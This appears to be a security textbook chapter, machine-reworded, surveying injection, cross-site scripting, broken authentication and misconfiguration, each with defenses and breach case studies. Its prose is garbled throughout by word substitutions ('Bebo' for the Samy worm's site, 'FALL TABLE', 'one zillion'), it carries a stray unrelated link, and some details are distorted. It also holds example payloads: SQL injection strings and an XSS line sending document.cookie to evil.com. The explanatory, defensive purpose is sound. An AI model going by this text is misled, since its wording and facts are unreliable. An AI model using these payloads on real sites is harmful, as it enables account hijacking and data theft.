Danger Landscape and Common Vulnerabilities

# Chapter some: Threat Landscape plus Common Vulnerabilities
Every application operates in a setting full involving threats – destructive actors constantly browsing for weaknesses to exploit. Understanding the risk landscape is vital for defense. Throughout this chapter, we'll survey the nearly all common varieties of app vulnerabilities and attacks seen in the particular wild today. We are going to discuss how these people work, provide real-life types of their écrasement, and introduce ideal practices to prevent these people. This will lay the groundwork for later chapters, which may delve deeper straight into how to construct security straight into the development lifecycle and specific defense.

Over the decades, certain categories of vulnerabilities have emerged as perennial troubles, regularly appearing in security assessments and even breach reports. Industry resources just like the OWASP Top 10 (for web applications) and even CWE Top twenty-five (common weaknesses enumeration) list these usual suspects. Let's check out some of the major ones:

## Injection Attacks (SQL, Command Injection, etc. )
- **Description**: Injection flaws happen when an software takes untrusted insight (often from a great user) and enters it into the interpreter or command word in a way that alters the intended execution. The particular classic example will be SQL Injection (SQLi) – where consumer input is concatenated into an SQL query without proper sanitization, allowing you inject their own SQL commands. Similarly, Command word Injection involves injecting OS commands, LDAP Injection into LDAP queries, NoSQL Injection in NoSQL directories, and so in. Essentially, the applying falls flat to distinguish data from code instructions.

- **How it works**: Consider some sort of simple login contact form that takes the username and password. If the particular server-side code naively constructs a query just like: `SELECT * BY users WHERE login = 'alice' AND EVEN password = 'mypassword'; `, an assailant can input something like `username: alice' OR '1'='1` and `password: anything`. The resulting SQL would become: `SELECT * COMING FROM users WHERE login = 'alice' OR '1'='1' AND pass word = 'anything'; `. The `'1'='1'` problem always true can make the problem return all users, effectively bypassing the particular password check. This specific is a simple sort of SQL treatment to force some sort of login.
More maliciously, an attacker could terminate the query through adding `; FALL TABLE users; --` to delete the users table (a destructive attack upon integrity) or `; SELECT credit_card THROUGH users; --` to dump sensitive files (a confidentiality breach).
- **Real-world impact**: SQL injection features been behind a few of the largest data removes on record. Many of us mentioned the Heartland Payment Systems breach – in 2008, attackers exploited the SQL injection in a web application in order to ultimately penetrate inner systems and grab millions of credit card numbers​
TWINGATE. COM
. Another circumstance: the TalkTalk 2015 breach in the united kingdom, where a teenager used SQL injection to get into the personal files of over a hundred and fifty, 000 customers. The subsequent investigation revealed TalkTalk had still left an obsolete web site with a known SQLi flaw on the web, and hadn't patched a database weakness from 2012​
ICO. ORG. UK
​
ICO. ORG. UK
. TalkTalk's CEO defined it as a basic cyberattack; indeed, SQLi was well-understood for a 10 years, yet the company's failure to sanitize inputs and revise software generated some sort of serious incident – they were fined and suffered reputational loss.
These examples show injection episodes can compromise discretion (steal data), integrity (modify or remove data), and accessibility (if data is usually wiped, service will be disrupted). Even today, injection remains a new common attack vector. In fact, OWASP's 2021 Top 10 still lists Injections (including SQL, NoSQL, command injection, etc. ) as being a best risk (category A03: 2021)​
IMPERVA. APRESENTANDO
.
- **Defense**: The particular primary defense towards injection is source validation and result escaping – make certain that any untrusted data is treated as pure data, never ever as code. Employing prepared statements (parameterized queries) with bound variables is some sort of gold standard for SQL: it sets apart the SQL code from your data principles, so even when an user goes in a weird chain, it won't crack the query composition. For example, utilizing a parameterized query in Java with JDBC, the previous sign in query would turn out to be `SELECT * COMING FROM users WHERE user name =? AND username and password =? `, in addition to the `? ` placeholders are guaranteed to user inputs safely (so `' OR EVEN '1'='1` would always be treated literally while an username, which usually won't match any real username, somewhat than part regarding SQL logic). Comparable approaches exist for other interpreters.
About top of that will, whitelisting input approval can restrict exactly what characters or formatting is allowed (e. g., an username could be restricted in order to alphanumeric), stopping a lot of injection payloads from the front door​
IMPERVA. COM
. Also, encoding output appropriately (e. g. CODE encoding to prevent script injection) is definitely key, which we'll cover under XSS.
Developers should by no means directly include raw input in directions. Secure frameworks plus ORM (Object-Relational Mapping) tools help by simply handling the question building for you. Finally, least privilege helps mitigate effect: the database consideration used by the particular app should have got only necessary rights – e. h. it will not have DROP TABLE rights if not necessary, to prevent an injection from performing irreparable harm.

## Cross-Site Scripting (XSS)
- **Description**: Cross-Site Scripting identifies the class of vulnerabilities where an application includes malicious scripts in the context regarding a trusted website. Unlike injection directly into a server, XSS is about inserting to the content that will other users see, commonly in the web web page, causing victim users' browsers to implement attacker-supplied script. Right now there are a few types of XSS: Stored XSS (the malicious script is definitely stored on the particular server, e. gary the gadget guy. in the database, and even served to various other users), Reflected XSS (the script will be reflected off the storage space immediately in the reaction, often with a lookup query or error message), and DOM-based XSS (the weakness is in client-side JavaScript that insecurely manipulates the DOM).

- **How this works**: Imagine a communication board where consumers can post responses. If the program does not sanitize HTML tags in remarks, an attacker could post an opinion like: ` var i=new Image(); i. src="http://evil.com/steal?cookie="+document.cookie; `. Any end user who views that comment will unintentionally run the software in their internet browser. The script over would send the user's session dessert to the attacker's server (stealing their own session, hence permitting the attacker to impersonate them on the site – a confidentiality and even integrity breach).
Inside a reflected XSS scenario, maybe the site shows your type by using an error site: in the event you pass the script in typically the URL along with the site echoes it, it will execute inside the browser of whomever clicked that harmful link.
Essentially, XSS turns the victim's browser into a good unwitting accomplice.
- **Real-world impact**: XSS can be really serious, especially about highly trusted websites (like great example of such, web mail, banking portals).  https://docs.shiftleft.io/sast/users/rbac  of famous early example of this was the Samy worm on Web sites in 2005. A person named Samy found out a stored XSS vulnerability in Bebo profiles. He designed a worm: some sort of script that, if any user seen his profile, it would add him as a good friend and copy the particular script to the viewer's own account. Doing this, anyone different viewing their profile got infected also. Within just something like 20 hours of release, over one zillion users' profiles experienced run the worm's payload, making Samy one of the fastest-spreading infections of time​
DURANTE. WIKIPEDIA. ORG
. Typically the worm itself simply displayed the key phrase "but most of all, Samy will be my hero" upon profiles, a comparatively harmless prank​
EN. WIKIPEDIA. ORG
. Even so, it absolutely was a wake-up call: if a good XSS worm can add friends, it could just mainly because easily have stolen private messages, spread junk, or done additional malicious actions on behalf of customers. Samy faced lawful consequences for this kind of stunt​
EN. WIKIPEDIA. ORG
.
In an additional scenario, XSS could be used to be able to hijack accounts: for instance, a shown XSS inside a bank's site could be exploited via a scam email that tips an user directly into clicking an LINK, which then completes a script in order to transfer funds or even steal session tokens.
XSS vulnerabilities need been present in web sites like Twitter, Facebook (early days), plus countless others – bug bounty programs commonly receive XSS reports. Although XSS bugs are of moderate severity (defaced UI, etc. ), some can be important if they permit administrative account takeover or deliver adware and spyware to users.
- **Defense**: The foundation of XSS defense is output encoding. Any user-supplied content material that is displayed in a page should be properly escaped/encoded so that this cannot be interpreted since active script. Regarding example, in the event that an end user writes ` bad() ` in an opinion, the server should store it and then output it since `< script> bad()< /script> ` thus that it comes up as harmless textual content, not as a great actual script. Modern day web frameworks frequently provide template engines that automatically escape variables, which prevents most reflected or even stored XSS by simply default.
Another significant defense is Content Security Policy (CSP) – a header that instructs web browsers to only execute scripts from certain options. A well-configured CSP can mitigate typically the impact of XSS by blocking in-line scripts or outside scripts that aren't explicitly allowed, nevertheless CSP can be sophisticated to set up without affecting blog functionality.
For programmers, it's also crucial to stop practices like dynamically constructing HTML CODE with raw information or using `eval()` on user input in JavaScript. Web applications can furthermore sanitize input to strip out banned tags or attributes (though it is challenging to get perfect). In summary: validate and sanitize virtually any HTML or JavaScript inputs, use context-appropriate escaping (HTML break free for HTML content, JavaScript escape regarding data injected in to scripts, etc. ), and consider allowing browser-side defenses want CSP.

## Damaged Authentication and Program Managing
- **Description**: These vulnerabilities involve weaknesses in exactly how users authenticate to be able to the application or perhaps maintain their authenticated session. "Broken authentication" can mean many different issues: allowing weak passwords, not protecting against brute force, faltering to implement correct multi-factor  authentication , or perhaps exposing session IDs. "Session management" is definitely closely related – once an customer is logged in, the app generally uses a session cookie or token to remember them; in the event that that mechanism is definitely flawed (e. gary the gadget guy. predictable session IDs, not expiring sessions, not securing the particular cookie), attackers may hijack other users' sessions.

- **How it works**: One particular common example is websites that enforced overly simple security password requirements or had no protection against trying many passwords. Attackers exploit this particular by using abilities stuffing (trying username/password pairs leaked from all other sites) or incredible force (trying a lot of combinations). If there are not any lockouts or even rate limits, an attacker can systematically guess credentials.
Another example: if a great application's session sandwich (the piece of info that identifies a new logged-in session) is not marked with all the Secure flag (so it's sent above HTTP as well as HTTPS) or perhaps not marked HttpOnly (so it can easily be accessible in order to scripts), it could be taken via network sniffing at or XSS. When an attacker provides a valid period token (say, stolen from an insecure Wi-Fi or by means of an XSS attack), they might impersonate of which user without seeking credentials.
There have got also been reasoning flaws where, for instance, the pass word reset functionality is definitely weak – probably it's susceptible to a good attack where a good attacker can reset to zero someone else's pass word by modifying guidelines (this crosses directly into insecure direct thing references / entry control too).
Overall, broken authentication addresses anything that allows an attacker to be able to either gain recommendations illicitly or bypass the login applying some flaw.
rapid **Real-world impact**: We've all seen information of massive "credential dumps" – great of username/password pairs floating around through past breaches. Assailants take these in addition to try them about other services (because many people reuse passwords). This automated abilities stuffing has directed to compromises involving high-profile accounts on various platforms.
A good example of broken auth was your case in spring 2012 where LinkedIn endured a breach and 6. 5 zillion password hashes (unsalted SHA-1) were leaked​
NEWS. SOPHOS. POSSUINDO
​
NEWS. SOPHOS. POSSUINDO
. The fragile hashing meant assailants cracked most associated with those passwords within just hours​
NEWS. SOPHOS. COM
​
REPORTS. SOPHOS. COM
. Even worse, a few years later it switched out the break was actually much larger (over one hundred million accounts). Individuals often reuse security passwords, so that breach had ripple outcomes across other websites. LinkedIn's failing was basically in cryptography (they didn't salt or use a strong hash), which will be part of protecting authentication data.
Another normal incident type: program hijacking. For instance, before most internet sites adopted HTTPS almost everywhere, attackers about the same community (like a Wi-Fi) could sniff biscuits and impersonate users – a threat popularized from the Firesheep tool in 2010, which usually let anyone bug on unencrypted sessions for sites like Facebook. This made web services in order to encrypt entire sessions, not just login pages.
There have also been cases of flawed multi-factor authentication implementations or login bypasses due to common sense errors (e. gary the gadget guy., an API that returns different text messages for valid as opposed to invalid usernames could allow an assailant to enumerate customers, or perhaps a poorly executed "remember me" symbol that's easy in order to forge). The outcomes of broken authentication are usually severe: unauthorized gain access to to user balances, data breaches, personality theft, or unauthorized transactions.
- **Defense**: Protecting authentication takes a multi-pronged approach:
-- Enforce strong username and password policies but within just reason. Current NIST guidelines recommend enabling users to choose long passwords (up to 64 chars) and never requiring recurrent changes unless there's indication of compromise​
JUMPCLOUD. COM
​
AUDITBOARD. COM
. Rather, check passwords against known breached security password lists (to disallow "P@ssw0rd" and typically the like). Also motivate passphrases that are less difficult to remember but hard to think.
- Implement multi-factor authentication (MFA). Some sort of password alone is often not enough these types of days; providing an option (or requirement) to get a second factor, as an one-time code or even a push notification, greatly reduces the risk of account give up even if accounts leak. Many main breaches could include been mitigated by MFA.
- Protected the session bridal party. Use the Safe flag on pastries so they usually are only sent more than HTTPS, HttpOnly so they aren't obtainable via JavaScript (mitigating some XSS impact), and consider SameSite to prevent these people from being dispatched in CSRF episodes (more on CSRF later). Make program IDs long, randomly, and unpredictable (to prevent guessing).
- Avoid exposing period IDs in URLs, because they can be logged or leaked via referer headers. Always prefer snacks or authorization headers.
- Implement consideration lockout or throttling for login tries. After say 5-10 failed attempts, both lock the be the cause of a period or even increasingly delay replies. Utilize CAPTCHAs or even other mechanisms if automated attempts will be detected. However, end up being mindful of denial-of-service – some sites opt for much softer throttling to steer clear of letting attackers locking mechanism out users simply by trying bad security passwords repeatedly.
- Session timeout and logout: Expire sessions after having a reasonable period regarding inactivity, and definitely invalidate session as well on logout. It's surprising how several apps in typically the past didn't appropriately invalidate server-side session records on logout, allowing tokens being re-used.
- Look closely at forgot password moves. Use secure as well or links through email, don't expose whether an consumer exists or not necessarily (to prevent end user enumeration), and ensure those tokens expire quickly.
Modern frameworks often handle a new lot of this kind of for you personally, but misconfigurations are routine (e. g., a developer may well accidentally disable some sort of security feature). Standard audits and testing (like using OWASP ZAP or other tools) can catch issues like absent secure flags or even weak password guidelines.
Lastly, monitor authentication events. Unusual styles (like a single IP trying a large number of usernames, or one accounts experiencing hundreds of hit a brick wall logins) should increase alarms. This overlaps with intrusion detection.
To emphasize, OWASP's 2021 list phone calls this category Id and Authentication Failures (formerly "Broken Authentication") and highlights the particular importance of such things as MFA, not using default credentials, and implementing proper username and password handling​
IMPERVA. APRESENTANDO
. They note that 90% of applications tested had challenges in this field in several form, quite mind boggling.

## Security Misconfiguration
- **Description**: Misconfiguration isn't just one weakness per se, although a broad class of mistakes throughout configuring the program or its surroundings that lead in order to insecurity. This may involve using default credentials or options, leaving unnecessary attributes enabled, misconfiguring safety measures headers, or not hardening the server. Fundamentally, the software may be secure in concept, nevertheless the way it's deployed or set up opens a pit.

- **How this works**: Examples involving misconfiguration:
- Leaving default admin accounts/passwords active. Many software program packages or equipment historically shipped together with well-known defaults